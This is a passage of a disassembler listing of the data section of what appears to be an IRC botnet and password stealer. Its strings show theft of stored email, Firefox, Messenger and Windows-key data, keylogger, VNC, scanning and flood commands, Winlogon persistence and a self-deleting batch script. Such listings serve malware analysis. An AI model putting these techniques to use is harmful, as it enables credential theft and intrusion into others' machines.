unicode 0, <K>,0
aJ_2: ; DATA XREF: .text:0044F3C4�o
unicode 0, <J>,0
asc_44FFE8: ; DATA XREF: .text:0044F3C0�o
unicode 0, <H>,0
aG_2: ; DATA XREF: .text:0044F3BC�o
unicode 0, <G>,0
aF_2: ; DATA XREF: .text:0044F3B8�o
; .text:0044F7B0�o
unicode 0, <F>,0
aD_3: ; DATA XREF: .text:0044F3B4�o
unicode 0, <D>,0
aS_10: ; DATA XREF: .text:0044F3B0�o
unicode 0, <S>,0
aA_1: ; DATA XREF: .text:0044F3AC�o
unicode 0, <A>,0
aO_3: ; DATA XREF: .text:0044F3A4�o
unicode 0, <O>,0
aI_4: ; DATA XREF: .text:0044F3A0�o
unicode 0, <I>,0
aU_3: ; DATA XREF: .text:0044F39C�o
unicode 0, <U>,0
aY_3: ; DATA XREF: .text:0044F398�o
unicode 0, <Y>,0
aT_3: ; DATA XREF: .text:0044F394�o
unicode 0, <T>,0
aR_2: ; DATA XREF: .text:0044F390�o
unicode 0, <R>,0
aE_4: ; DATA XREF: .text:0044F38C�o
unicode 0, <E>,0
aW_2: ; DATA XREF: .text:0044F388�o
unicode 0, <W>,0
aQ_3: ; DATA XREF: .text:0044F384�o
unicode 0, <Q>,0
aM_7: ; DATA XREF: .text:0044F380�o
; .text:0044F71C�o
unicode 0, <m>,0
aN_5: ; DATA XREF: .text:0044F37C�o
; .text:0044F720�o
unicode 0, <n>,0
aB_2: ; DATA XREF: .text:0044F378�o
; .text:0044F6EC�o ...
unicode 0, <b>,0
aV_3: ; DATA XREF: .text:0044F374�o
; .text:0044F73C�o
unicode 0, <v>,0
aZ_5: ; DATA XREF: .text:0044F368�o
; .text:0044F74C�o ...
unicode 0, <z>,0
asc_450038: ; DATA XREF: .text:0044F364�o
; .text:0044F718�o
unicode 0, <l>,0
aK_4: ; DATA XREF: .text:0044F360�o
; .text:0044F714�o
unicode 0, <k>,0
aJ_3: ; DATA XREF: .text:0044F35C�o
; .text:0044F710�o
unicode 0, <j>,0
asc_450044: ; DATA XREF: .text:0044F358�o
; .text:0044F704�o
unicode 0, <h>,0
aG_3: ; DATA XREF: .text:0044F354�o
; .text:0044F700�o ...
unicode 0, <g>,0
aF_3 db 'f',0 ; DATA XREF: .text:0044F350�o
; .text:0044F6FC�o
off_45004E dd offset dword_640000 ; DATA XREF: .text:off_44ED34�o
; .text:0044ED80�o ...
db 0
byte_450053 db 0 ; DATA XREF: .text:0044ED70�o
dword_450054 dd 70h ; .text:0044F340�o ...
dword_450058 dd 69h ; .text:0044F708�o
dword_45005C dd 75h ; .text:0044F738�o
dword_450060 dd 74h ; .text:0044F734�o
dword_450064 dd 77h ; .text:0044F740�o
aSPstore_dllNot db '%s PStore.dll not loaded',0 ; DATA XREF: sub_423846+B1�o
align 4
aPop3Pass2 db 'POP3 Pass2',0 ; DATA XREF: sub_423919+29C�o
align 10h
aPop3Server db 'POP3 Server',0 ; DATA XREF: sub_423919+250�o
aPop3UserName db 'POP3 User Name',0 ; DATA XREF: sub_423919+1FC�o
align 4
aHttpmailPass2 db 'HTTPMail Pass2',0 ; DATA XREF: sub_423919+15F�o
align 4
aHotmail db 'Hotmail',0 ; DATA XREF: sub_423919+144�o
aHttpmailUserna db 'HTTPMail UserName',0 ; DATA XREF: sub_423919+F3�o
align 4
aSoftwareMicr_1 db 'Software\Microsoft\Internet Account Manager\Accounts',0
; DATA XREF: sub_423919+2C�o
; sub_423919+96�o
align 10h
aSNoPstoreEntri db '%s No PStore entries found.',0 ; DATA XREF: sub_423C7A+909�o
dword_45012C dd 2207325h, 61724528h, 20646573h, 6C74754Fh, 206B6F6Fh
; DATA XREF: sub_423C7A+87E�o
dd 72707845h, 29737365h, 220023Ah, 702F6C28h, 20023A29h
dd 3A73255Bh, 5D7325h
dword_45015C dd 2207325h, 74754F28h, 6B6F6F6Ch, 70784520h, 73736572h
; DATA XREF: sub_423C7A+83A�o
dd 20023A29h, 2207325h, 702F6C28h, 20023A29h, 3A73255Bh
dd 5D7325h
a220d5cc1 db '220d5cc1',0 ; DATA XREF: sub_423C7A+788�o
align 4
dword_450194 dd 2207325h, 4E534D28h, 2F444920h, 73736150h, 20023A29h
; DATA XREF: sub_423C7A+750�o
dd 2F6C2802h, 23A2970h, 73255B20h, 5D73253Ah, 0
aB9819c52 db 'b9819c52',0 ; DATA XREF: sub_423C7A+5E9�o
align 4
dword_4501C8 dd 2207325h, 20454928h, 294C5255h, 2520023Ah, 28022073h
; DATA XREF: sub_423C7A+5C4�o
dd 29702F6Ch, 5B20023Ah, 253A7325h, 5D73h
dword_4501EC dd 70747468h, 2F3A73hdword_4501F4 dd 70747468h, 2F3Ahdword_4501FC dd 7274533Ah, 676E69h ; sub_423C7A+4D2�o
aStringindex db 'StringIndex',0 ; DATA XREF: sub_423C7A+4A0�o
aE161255a db 'e161255a',0 ; DATA XREF: sub_423C7A+486�o
align 4
dword_45021C dd 2207325h, 20454928h, 204C5255h, 63617448h, 73736563h
; DATA XREF: sub_423C7A+461�o
dd 20023A29h, 2207325h, 702F6C28h, 20023A29h, 3A73255Bh
dd 5D7325h
a5e7e8100 db '5e7e8100',0 ; DATA XREF: sub_423C7A+3B1�o
align 4
aWs db '%ws',0 ; DATA XREF: sub_423C7A+2DD�o
asc_450258 db '%x',0 ; DATA XREF: sub_423C7A+1F1�o
align 4
dword_45025C dd 5A6F1EC0h, 11D02DB1h, 0C000398Ch, 6B12D94Fh ; sub_423C7A+232�o ...
dword_45026C dd 6E207325h, 2520746Fh, 2E73haProtectedstora db 'ProtectedStorage',0 ; DATA XREF: sub_423C7A+13�o
align 4
aPl_base64decod db 'PL_Base64Decode',0 ; DATA XREF: sub_424762+1D4�o
aPk11_checkuser db 'PK11_CheckUserPassword',0 ; DATA XREF: sub_424762+189�o
align 4
aPk11sdr_decryp db 'PK11SDR_Decrypt',0 ; DATA XREF: sub_424762+177�o
aPk11_authentic db 'PK11_Authenticate',0 ; DATA XREF: sub_424762+165�o
align 4
aPk11_freeslot db 'PK11_FreeSlot',0 ; DATA XREF: sub_424762+153�o
align 4
aPk11_getintern db 'PK11_GetInternalKeySlot',0 ; DATA XREF: sub_424762+141�o
aNss_shutdown db 'NSS_Shutdown',0 ; DATA XREF: sub_424762+12F�o
align 10h
aNss_init db 'NSS_Init',0 ; DATA XREF: sub_424762+122�o
align 4
aSoftokn3_dll db 'softokn3.dll',0 ; DATA XREF: sub_424762+C9�o
align 4
aSqlite3_dll db 'sqlite3.dll',0 ; DATA XREF: sub_424762+7A�o
aNssutil3_dll db 'nssutil3.dll',0 ; DATA XREF: sub_424762+69�o
align 4
aPlds4_dll db 'plds4.dll',0 ; DATA XREF: sub_424762+4B�o
; sub_424762+94�o
align 4
aNspr4_dll db 'nspr4.dll',0 ; DATA XREF: sub_424762+34�o
align 10h
aMozcrt19_dll db 'mozcrt19.dll',0 ; DATA XREF: sub_424762+28�o
align 10h
aNss3_dll db 'nss3.dll',0 ; DATA XREF: sub_424762+1D�o
align 4
aPlc4_dll db 'plc4.dll',0 ; DATA XREF: sub_424762+18�o
align 4
asc_450388 db ': ',0 ; DATA XREF: sub_424B0B+1AB�o
; sub_42BEF9+28�o
align 4
dword_45038C dd 2207325h, 25464628h, 52552064h, 23A294Ch, 20732520h
; DATA XREF: sub_424B0B+11E�o
dd 2F6C2802h, 23A2970h, 20h
dword_4503AC dd 6E676973h, 33736E6Fh, 7478742Eh, 0 ; sub_425092+171�o
dword_4503BC dd 6E676973h, 32736E6Fh, 7478742Eh, 0 ; sub_425092+14E�o
dword_4503CC dd 6E676973h, 2E736E6Fh, 747874h ; sub_425092+12B�o
aSoftwareClient db 'SOFTWARE\Clients\StartMenuInternet\firefox.exe\shell\open\command'
; DATA XREF: sub_424D65+F�o
db 0
align 4
aPath_0 db 'path=',0 ; DATA XREF: sub_424EAB:loc_424FB6�o
align 4
aNameDefault db 'name=default',0 ; DATA XREF: sub_424EAB+F1�o
align 4
aProfiles_ini db '\profiles.ini',0 ; DATA XREF: sub_424EAB+AC�o
align 4
aApplicationDat db 'Application Data\Mozilla\Firefox',0 ; DATA XREF: sub_424EAB+2A�o
align 4
aCurrentversion db 'CurrentVersion',0 ; DATA XREF: sub_425092+80�o
align 4
aSoftwareMozi_0 db 'SOFTWARE\mozilla.org\Mozilla',0 ; DATA XREF: sub_425092+5F�o
align 4
aSoftwareMozill db 'SOFTWARE\Mozilla\Mozilla Firefox',0 ; DATA XREF: sub_425092+45�o
align 4
aAllowD db 'Allow%d',0 ; DATA XREF: sub_42521F+1DE�o
dword_4504C4 dd 4E534D02h, 2520023Ah, 73haSoftwareMicr_3 db 'Software\Microsoft\MessengerService\ListCache\.NET Messenger Serv'
; DATA XREF: sub_42521F+194�o
db 'ice',0
align 4
aSoftwareMicr_2 db 'Software\Microsoft\WAB\WAB4\Wab File Name',0 ; DATA XREF: sub_42521F+41�o
align 4
byte_450544 db 42h ; DATA XREF: sub_425489+A3�r
aCdfghjkmpqrtvw db 'CDFGHJKMPQRTVWXY2346789',0
align 10h
aDigitalproduct db 'DigitalProductId',0 ; DATA XREF: sub_425489+43�o
align 4
aSoftwareMicr_4 db 'SOFTWARE\Microsoft\Windows NT\CurrentVersion',0
; DATA XREF: sub_425489+15�o
align 4
aSWindowsKeyNot db '%s Windows Key not found.',0 ; DATA XREF: sub_425568+16F�o
align 10h
aSWindowsSSKey_ db '%s Windows %s (%s) Key: %.29s',0 ; DATA XREF: sub_425568+149�o
align 10h
a2008 db '2008',0 ; DATA XREF: sub_425568:loc_425671�o
align 4
aVnc db '[VNC]:',0 ; DATA XREF: sub_425786+F7�o
align 10h
aKeylogger db '[KEYLOGGER]:',0 ; DATA XREF: sub_425786+E2�o
align 10h
aTftp_0 db '[TFTP]:',0 ; DATA XREF: sub_425786+CD�o
aFtp_0 db '[FTP]:',0 ; DATA XREF: sub_425786+B8�o
align 10h
aScan db '[SCAN]:',0 ; DATA XREF: sub_425786+A7�o
aMain_1 db '[MAIN]:',0 ; DATA XREF: sub_425786+96�o
aPhpshell db 'phpshell',0 ; DATA XREF: sub_425786+85�o
align 4
aWget db 'wget',0 ; DATA XREF: sub_425786+74�o
align 4
aPush db '!* PUSH',0 ; DATA XREF: sub_425786+63�o
aPan db '!* PAN',0 ; DATA XREF: sub_425786+52�o
align 4
aUdp db '!* UDP',0 ; DATA XREF: sub_425786:loc_4257C7�o
align 4
aSh db '!* SH',0 ; DATA XREF: sub_425786+2B�o
align 4
aTopic_0 db 'TOPIC',0 ; DATA XREF: sub_425892+F7�o
align 4
aNotice db 'NOTICE',0 ; DATA XREF: sub_425892+E2�o
align 4
aUserhost db 'USERHOST',0 ; DATA XREF: sub_425892+CD�o
align 10h
aPing db 'PING',0 ; DATA XREF: sub_425892+B8�o
align 4
aPong db 'PONG',0 ; DATA XREF: sub_425892+A7�o
align 10h
aOper db 'OPER',0 ; DATA XREF: sub_425892+96�o
align 4
aJoin db 'JOIN',0 ; DATA XREF: sub_425892+85�o
align 10h
aPrivmsg db 'PRIVMSG',0 ; DATA XREF: sub_425892+74�o
aNowANetworkAdm db 'now a network administrator',0 ; DATA XREF: sub_425892+63�o
aIrcOperator db 'IRC Operator',0 ; DATA XREF: sub_425892+52�o
align 4
aPass_0 db 'PASS ',0 ; DATA XREF: sub_425892:loc_4258D3�o
; sub_42599E:loc_425A01�o
align 4
aUser_1 db 'USER ',0 ; DATA XREF: sub_42599E+4D�o
align 4
aMail db 'Mail',0 ; DATA XREF: sub_42599E+3C�o
align 4
off_4506DC dd offset byte_4B4F2B ; DATA XREF: sub_42599E+2B�o
a_bot_login db '_BOT_LOGIN',0 ; DATA XREF: sub_425A16:loc_425A57�o
align 4
a_bot db '_BOT',0 ; DATA XREF: sub_425A16+2B�o
align 4
aOpenssh_2 db 'OpenSSH_2',0 ; DATA XREF: sub_425A6C+63�o
align 10h
aServUFtpServer db 'Serv-U FTP Server',0 ; DATA XREF: sub_425A6C+52�o
align 4
aApache1_3 db 'Apache/1.3',0 ; DATA XREF: sub_425A6C:loc_425AAD�o
align 10h
aOpenssl0_9_6 db 'OpenSSL/0.9.6',0 ; DATA XREF: sub_425A6C+2B�o
align 10h
dword_450730 dd 6C755602h, 22F2F6EhaSDSDS db ' (%s:%d) -> (%s:%d) - "%s"',0
align 4
unk_450754 db 2 ; DATA XREF: sub_425AE4+2CA�o
db 50h, 48h, 50h
db 2Fh ; /
db 2Fh, 2, 20h
aSDSDS_0 db '(%s:%d) -> (%s:%d) - "%s"',0
align 4
unk_450778 db 2 ; DATA XREF: sub_425AE4+2A0�o
db 46h, 54h, 50h
db 2Fh ; /
db 2Fh, 2, 20h
aSDSDS_1 db '(%s:%d) -> (%s:%d) - "%s"',0
align 4
unk_45079C db 2 ; DATA XREF: sub_425AE4+276�o
db 49h, 52h, 43h
db 2Fh ; /
db 2Fh, 2, 20h
aSDSDS_2 db '(%s:%d) -> (%s:%d) - "%s"',0
align 10h
unk_4507C0 db 2 ; DATA XREF: sub_425AE4+249�o
db 42h, 6Fh, 74h
db 2Fh ; /
db 2Fh, 2, 20h
aSDSDS_3 db '(%s:%d) -> (%s:%d) - "%s"',0
align 4
aPostHttp1_1Hos db 'POST / HTTP/1.1',0Dh,0Ah ; DATA XREF: sub_425E18+E5�o
db 'Host: %s',0Dh,0Ah
db 'Content-Length: %d',0Dh,0Ah
db 0Dh,0Ah,0
align 4
aSEuropeDKbitSU db '%s ~ Europe[%d kbit/s] ~ USA[%d kbit/s] ~ Asia[%d kbit/s] ~ Avera'
; DATA XREF: sub_425FFA+275�o
db 'ge[%d kbit/s]',0
align 4
aWww_kaist_ac_k db 'www.kaist.ac.kr',0 ; DATA XREF: sub_425FFA+14E�o
aWww_pku_edu_cn db 'www.pku.edu.cn',0 ; DATA XREF: sub_425FFA+147�o
align 4
aWww_bandai_co_ db 'www.bandai.co.jp',0 ; DATA XREF: sub_425FFA+140�o
align 4
aWww_seikoWatch db 'www.seiko-watch.co.jp',0 ; DATA XREF: sub_425FFA+139�o
align 4
aWww_nintendo_0 db 'www.nintendo.co.jp',0 ; DATA XREF: sub_425FFA+132�o
align 4
aWww_nthu_edu_t db 'www.nthu.edu.tw',0 ; DATA XREF: sub_425FFA+12B�o
aWww_lib_nthu_e db 'www.lib.nthu.edu.tw',0 ; DATA XREF: sub_425FFA+124�o
aWww_umin_ac_jp db 'www.umin.ac.jp',0 ; DATA XREF: sub_425FFA+11D�o
align 4
aUnimelb_edu_au db 'unimelb.edu.au',0 ; DATA XREF: sub_425FFA+116�o
align 4
aWww_conexim_co db 'www.conexim.com.au',0 ; DATA XREF: sub_425FFA+10F�o
align 10h
aGamearena_com_ db 'gamearena.com.au',0 ; DATA XREF: sub_425FFA+108�o
align 4
aWww_nintendo_c db 'www.nintendo.com',0 ; DATA XREF: sub_425FFA+101�o
align 4
aWww_apple_com db 'www.apple.com',0 ; DATA XREF: sub_425FFA+FA�o
align 4
aWww_easynews_c db 'www.easynews.com',0 ; DATA XREF: sub_425FFA+F3�o
align 4
aWww_above_net db 'www.above.net',0 ; DATA XREF: sub_425FFA+EC�o
align 4
aWww_level3_com db 'www.level3.com',0 ; DATA XREF: sub_425FFA+E5�o
align 4
aWww_burst_net db 'www.burst.net',0 ; DATA XREF: sub_425FFA+DE�o
align 4
aWww_cogentco_c db 'www.cogentco.com',0 ; DATA XREF: sub_425FFA+D7�o
align 10h
aWww_rit_edu db 'www.rit.edu',0 ; DATA XREF: sub_425FFA+D0�o
aWww_nocster_co db 'www.nocster.com',0 ; DATA XREF: sub_425FFA+C9�o
aWww_stanford_e db 'www.stanford.edu',0 ; DATA XREF: sub_425FFA+C2�o
align 10h
aWww_xo_net db 'www.xo.net',0 ; DATA XREF: sub_425FFA+BB�o
align 4
aWww_google_com db 'www.google.com',0 ; DATA XREF: sub_425FFA+B4�o
align 4
aWww_nintendoEu db 'www.nintendo-europe.com',0 ; DATA XREF: sub_425FFA+AD�o
aWww_supergames db 'www.supergames.cz',0 ; DATA XREF: sub_425FFA+A6�o
align 4
aWww_epfl_ch db 'www.epfl.ch',0 ; DATA XREF: sub_425FFA+9F�o
aWww_hon_ch db 'www.hon.ch',0 ; DATA XREF: sub_425FFA+98�o
align 10h
aWww_switch_ch db 'www.switch.ch',0 ; DATA XREF: sub_425FFA+91�o
align 10h
aWww_1und1_de db 'www.1und1.de',0 ; DATA XREF: sub_425FFA+8A�o
align 10h
aWww_rtv_de db 'www.rtv.de',0 ; DATA XREF: sub_425FFA+83�o
align 4
aWww_rollingsto db 'www.rollingstone.de',0 ; DATA XREF: sub_425FFA+7C�o
aWww_uniTuebing db 'www.uni-tuebingen.de',0 ; DATA XREF: sub_425FFA+72�o
align 4
aWww_univAngers db 'www.univ-angers.fr',0 ; DATA XREF: sub_425FFA+68�o
align 4
aVerio_fr db 'verio.fr',0 ; DATA XREF: sub_425FFA+5E�o
align 4
aWww_volkskrant db 'www.volkskrant.nl',0 ; DATA XREF: sub_425FFA+54�o
align 4
aWww_news_nl db 'www.news.nl',0 ; DATA XREF: sub_425FFA+4A�o
aWww_utwente_nl db 'www.utwente.nl',0 ; DATA XREF: sub_425FFA+40�o
align 4
aWww_schlund_ne db 'www.schlund.net',0 ; DATA XREF: sub_425FFA+36�o
a0123456789abcd db '0123456789ABCDEFGHIJKLMNOPQRSTUVWXWYZabcdefghijklmnopqrstuvwxyz',0
; DATA XREF: sub_426323+1D�o
a432 db '432',0 ; DATA XREF: sub_4263D5+87�o
aSS_0 db '%s %s',0Ah,0 ; DATA XREF: sub_4263D5+6B�o
; sub_4263D5+C2�o ...
align 4
aSSSSMail_gmail db '%s %s',0Ah ; DATA XREF: sub_4264CB+101�o
db '%s %s "mail.gmail.com" "127.0.0.1" :%s',0Ah,0
align 8
aAbcdefghijkl_0 db 'abcdefghijklmnopqrstuvwxyz1234567890-|`_\{[]}abcdefghijklmnopqrst'
; DATA XREF: sub_426761+C8�o
; sub_426761+180�r ...
db 'uvwxyz',0
aMirc32 db 'mIRC32',0 ; DATA XREF: sub_426C45+1F�o
align 4
a0_0_0_0 db '0.0.0.0',0 ; DATA XREF: sub_42722B+100�o
aSSSWithDPackS db '%s %s (%s) with (%d) pack(s)',0 ; DATA XREF: sub_42757B+1AA�o
align 10h
aSoftwareMicr_5 db 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon',0
; DATA XREF: sub_4277F1+25�o
align 4
aShell db 'Shell',0 ; DATA XREF: sub_4277F1+20�o
align 10h
a_2d_2d4d_2d_2d db '%.2d/%.2d/%4d, %.2d:%.2d %s',0 ; DATA XREF: sub_427BC4+6C�o
aAm db 'AM',0 ; DATA XREF: sub_427BC4+49�o
align 10h
aPm db 'PM',0 ; DATA XREF: sub_427BC4+3E�o
align 8
a@echoOffRepe_0 db '@echo off',0Dh,0Ah ; DATA XREF: sub_427C81:loc_427D5E�o
db ':Repeat',0Dh,0Ah
db 'del "%s">nul',0Dh,0Ah
db 'if exist "%s" goto Repeat',0Dh,0Ah
db 'del "%%0"',0Dh,0Ah,0
align 8
a@echoOffRepeat db '@echo off',0Dh,0Ah ; DATA XREF: sub_427C81+D6�o
db ':Repeat',0Dh,0Ah
db 'del "%s">nul',0Dh,0Ah
db 'ping 127.0.0.1>nul',0Dh,0Ah
db 'if exist "%s" goto Repeat',0Dh,0Ah
db 'del "%%0"',0Dh,0Ah,0
align 4
aSSIIII_bat db '%s\%s%i%i%i%i.bat',0 ; DATA XREF: sub_427C81+78�o
align 4
aExplorer_exe db 'Explorer.exe',0 ; DATA XREF: sub_427F60+93�o
align 4
a__ db '..',0 ; DATA XREF: sub_42810F+AF�o
align 10h
a_ db '\*.*',0 ; DATA XREF: sub_42810F+3B�o
align 4
aSFailedToConne db '%s Failed to connect to HTTP server.',0 ; DATA XREF: sub_428248+1DE�o
align 10h
aSCouldNotOpenA db '%s Could not open a connection.',0 ; DATA XREF: sub_428248+1D2�o
aSInvalidUrl_ db '%s Invalid URL.',0 ; DATA XREF: sub_428248+1BD�o
align 4
aSFailedToGetRe db '%s Failed to get requested URL from HTTP server.',0
; DATA XREF: sub_428248:loc_4283F3�o
align 4
aSUrlVisited_ db '%s URL visited.',0 ; DATA XREF: sub_428248+1A4�o
asc_450DD8 db '*/*',0 ; DATA XREF: sub_428248+48�o
aSSPortsHitS db '%s %s, ports hit: (%s)',0 ; DATA XREF: sub_4284A5+3E�o
align 4
aSD db '%s%d ',0 ; DATA XREF: sub_428660+19D�o
align 10h
off_450E00 dd offset off_4374BC ; DATA XREF: .text:off_437F80�o
; .text:00437FC4�o ...
align 8
a_?avlength_err db '.?AVlength_error@std@@',0
align 10h
dword_450E20 dd 0DF0B3D60h, 101B548Fh, 8658Eh, 19D12B2Bhoff_450E30 dd offset off_4374BC ; DATA XREF: .text:off_438058�o
; .text:00438094�o ...
align 8
a_?av_com_error db '.?AV_com_error@@',0
align 10h
dword_450E50 dd 1B3Fh align 10h
dd 9875h, 9873h
off_450E68 dd offset sub_42A990 ; DATA XREF: sub_430B07�r
off_450E6C dd offset nullsub_2 ; DATA XREF: sub_42ABF8:loc_42AC3A�r
off_450E70 dd offset nullsub_2 ; DATA XREF: sub_42AC8B�r
dword_450E74 dd 19930520h, 6 dup(0) ; sub_42ADA2+2�o
dd offset sub_4320A0
align 10h
off_450EA0 dd offset off_4374BC ; DATA XREF: .text:off_4380D0�o
; .text:0043810C�o
align 8
a_?avtype_info@ db '.?AVtype_info@@',0
align 10h
off_450EC0 dd offset dword_677020 ; DATA XREF: sub_42BF84�o
; sub_42C118+55�o ...
align 8
dd offset dword_677020
dd 101h
dword_450ED0 dd 2 dup(0) dd 1000h, 0
dword_450EE0 dd 3 dup(0) ; sub_42DB65+50�o ...
dd 2, 1, 3 dup(0)
dword_450F00 dd 3 dup(0) ; sub_42DB65+58�o ...
dd 2 dup(2), 7 dup(0)
dword_450F30 dd 7Ch dup(0) dword_451120 dd 8 dup(0) ; sub_42C226+D�o
off_451140 dd offset sub_430B45 ; DATA XREF: sub_42C118+69�o
; sub_42C67C+1C�r
dword_451144 dd 2 ; sub_43235A+34�r ...
dd 10h, 0
off_451150 dd offset off_451150 ; DATA XREF: sub_42D3F9+D�o
; sub_42D3F9+69�o ...
off_451154 dd offset off_451150 ; DATA XREF: sub_42D3F9:loc_42D479�r
; sub_42D3F9+89�w ...
dd offset dword_451168
dd offset dword_451168
dword_451160 dd 0FFFFFFFFh ; sub_42D53D:loc_42D58A�w
dd 0FFFFFFFFh
dword_451168 dd 0F0h, 0F1h, 800h dup(0) ; .text:0045115C�o
off_453170 dd offset off_451150 ; DATA XREF: sub_42D53D+15�r
; sub_42D53D+20�w ...
dword_453174 dd 1E0h ; sub_42B39A+A7�r ...
dword_453178 dd 0 ; sub_42DB50+6�r
off_45317C dd offset dword_676940 ; DATA XREF: sub_42DAC6+1F�r
dd 7 dup(0)
off_45319C dd offset dword_676970 ; DATA XREF: sub_42DAC6+17�r
dd 3 dup(0)
off_4531AC dd offset dword_676988 ; DATA XREF: sub_42DAC6+F�r
dd 3 dup(0)
off_4531BC dd offset dword_676958 ; DATA XREF: sub_42DAC6+7�r
dd 7 dup(0)
dd 0B42798h, 16h dup(0)
off_453238 dd offset aNull_0 ; DATA XREF: sub_42DC7D:loc_42DFE1�r
; sub_42DC7D+457�r
; "(null)"
off_45323C dd offset aNull ; DATA XREF: sub_42DC7D+259�r
; "(null)"
dword_453240 dd 0Bh ; sub_42E487+F�w ...
dword_453244 dd 0D2D0920h, 5Dhdword_45324C dd 5Dh dword_453250 dd 1 dword_453254 dd 16h dd 2 dup(2), 3, 2, 4, 18h, 5, 0Dh, 6, 9, 7, 0Ch, 8, 0Ch
dd 9, 0Ch, 0Ah, 7, 0Bh, 8, 0Ch, 16h, 0Dh, 16h, 0Fh, 2
dd 10h, 0Dh, 11h, 2 dup(12h), 2, 21h, 0Dh, 35h, 2, 41h
dd 0Dh, 43h, 2, 50h, 11h, 52h, 0Dh, 53h, 0Dh, 57h, 16h
dd 59h, 0Bh, 6Ch, 0Dh, 6Dh, 20h, 70h, 1Ch, 72h, 9, 6, 16h
dd 80h, 0Ah, 81h, 0Ah, 82h, 9, 83h, 16h, 84h, 0Dh, 91h
dd 29h, 9Eh, 0Dh, 0A1h, 2, 0A4h, 0Bh, 0A7h, 0Dh, 0B7h
dd 11h, 0CEh, 2, 0D7h, 0Bh, 718h, 0Ch
off_4533B8 dd offset word_4533C2 ; DATA XREF: sub_429E59:loc_429E89�r
; sub_429E59:loc_429F46�r ...
dd offset word_4533C2
db 2 dup(0)
word_4533C2 dw 20h ; DATA XREF: sub_434D3F+18�r
; .text:off_4533B8�o ...
unicode 0, < ((((( H>
dd 7 dup(100010h), 840010h, 4 dup(840084h), 100084h, 3 dup(100010h)
dd 3 dup(810081h), 0Ah dup(10001h), 3 dup(100010h), 3 dup(820082h)
dd 0Ah dup(20002h), 2 dup(100010h), 20h, 40h dup(0)
dword_4535C4 dd 1 ; sub_429E59:loc_429F2E�r ...
byte_4535C8 db 2Eh ; DATA XREF: sub_42E5F5:loc_42E8E9�r
; sub_42E5F5+311�r ...
align 4
dd 1
dword_4535D0 dd 0FFFFFFFFh, 0A00h, 8 dup(0) ; sub_42F3E2:loc_42F466�o
dword_4535F8 dd 14h off_4535FC dd offset dword_437620 ; DATA XREF: sub_43022E:loc_43024B�r
dd 1Dh, 43761Ch, 1Ah, 437618h, 1Bh, 437610h, 1Fh, 437608h
dd 13h, 437600h, 21h, 4375F8h, 0Eh, 4375F0h, 0Dh, 4375E8h
dd 0Fh, 4375E0h, 10h, 4375D8h, 5, 4375D0h, 1Eh, 4375CCh
dd 12h, 4375C8h, 20h, 4375C4h, 0Ch, 4375BCh, 0Bh, 4375B4h
dd 15h, 4375ACh, 1Ch, 4375A4h, 19h, 43759Ch, 11h, 437594h
dd 18h, 43758Ch, 16h, 437584h, 17h, 43757Ch, 22h, 437578h
dd 23h, 437574h, 24h, 437570h
dbl_4536D0 dq 1.797693134862316e308 ; DATA XREF: sub_42FF67+B7�r
; sub_42FF67:loc_43004E�r ...
dd 0
dd 0FFF80000h
dbl_4536E0 dq 1.797693134862316e308 ; DATA XREF: sub_42FF67+92�r
; sub_42FF67:loc_430026�r ...
dd 0
dd 100000h, 0
dd 80000000h
tbyte_4536F8 dt 2.3562723457267347066e313 ; DATA XREF: sub_430416+D�r
; sub_430416+1F�r
align 4
tbyte_453704 dt 1.9149954921904370718e-1233 ; DATA XREF: sub_430416+31�r
align 10h
dd 2 dup(43h), 20h dup(0)
dd 43h, 20h dup(0)
off_45381C dd offset sub_430A91 ; DATA XREF: sub_42A9A8+F�w
; sub_42DC7D+3AA�r
off_453820 dd offset sub_43073B ; DATA XREF: sub_42A9A8+5�w
; sub_42DC7D+3E2�r
off_453824 dd offset sub_4307A1 ; DATA XREF: sub_42A9A8+14�w
; sub_42E5F5+430�r
off_453828 dd offset sub_4306E1 ; DATA XREF: sub_42A9A8+1E�w
; sub_42DC7D+3CB�r
off_45382C dd offset sub_430789 ; DATA XREF: sub_42A9A8+28�w
off_453830 dd offset sub_430A91 ; DATA XREF: sub_42A9A8+32�w
align 8
dword_453838 dd 0C0000005h, 0Bh, 0 ; sub_42E555+7B�o
dd 0C000001Dh, 4, 0
dd 0C0000096h, 4, 0
db 8Dh, 0
dw 0C000h
dd 8, 0
dd 0C000008Eh, 8, 0
dd 0C000008Fh, 8, 0
db 90h
db 2 dup(0), 0C0h
dd 8, 0
dd 0C0000091h, 8, 0
dd 0C0000092h, 8, 0
dd 0C0000093h, 8, 0
dword_4538B0 dd 3 ; sub_430C27+86�r ...
dword_4538B4 dd 7 ; sub_430C27+8C�r ...
dd 78h
dword_4538BC dd 0Ah ; sub_4351A3+4�r
off_4538C0 dd offset a_cmd ; DATA XREF: sub_431128+109�o
; ".cmd"
dd offset a_bat ; ".bat"
dd offset a_exe ; ".exe"
off_4538CC dd offset a_com ; DATA XREF: sub_431128+E7�o
; ".com"
dd offset sub_4320A0
align 10h
off_4538E0 dd offset sub_431BCC ; DATA XREF: sub_431C2D+29�r
off_4538E4 dd offset aNoError ; DATA XREF: sub_42BEF9:loc_42BF56�r
; "No error"
dd offset aOperationNotPe ; "Operation not permitted"
dd offset aNoSuchFileOrDi ; "No such file or directory"
dd offset aNoSuchProcess ; "No such process"
dd offset aInterruptedFun ; "Interrupted function call"
dd offset aInputOutputErr ; "Input/output error"
dd offset aNoSuchDeviceOr ; "No such device or address"
dd offset aArgListTooLong ; "Arg list too long"
dd offset aExecFormatErro ; "Exec format error"
dd offset aBadFileDescrip ; "Bad file descriptor"
dd offset aNoChildProcess ; "No child processes"
dd offset aResourceTempor ; "Resource temporarily unavailable"
dd offset aNotEnoughSpace ; "Not enough space"
dd offset aPermissionDeni ; "Permission denied"
dd offset aBadAddress ; "Bad address"
dd offset aUnknownError ; "Unknown error"
dd offset aResourceDevice ; "Resource device"
dd offset aFileExists ; "File exists"
dd offset aImproperLink ; "Improper link"
dd offset aNoSuchDevice ; "No such device"
dd offset aNotADirectory ; "Not a directory"
dd offset aIsADirectory ; "Is a directory"
dd offset aInvalidArgumen ; "Invalid argument"
dd offset aTooManyOpenF_0 ; "Too many open files in system"
dd offset aTooManyOpenFil ; "Too many open files"
dd offset aInappropriateI ; "Inappropriate I/O control operation"
dd offset aUnknownError ; "Unknown error"
dd offset aFileTooLarge ; "File too large"
dd offset aNoSpaceLeftOnD ; "No space left on device"
dd offset aInvalidSeek ; "Invalid seek"
dd offset aReadOnlyFileSy ; "Read-only file system"
dd offset aTooManyLinks ; "Too many links"
dd offset aBrokenPipe ; "Broken pipe"
dd offset aDomainError ; "Domain error"
dd offset aResultTooLarge ; "Result too large"
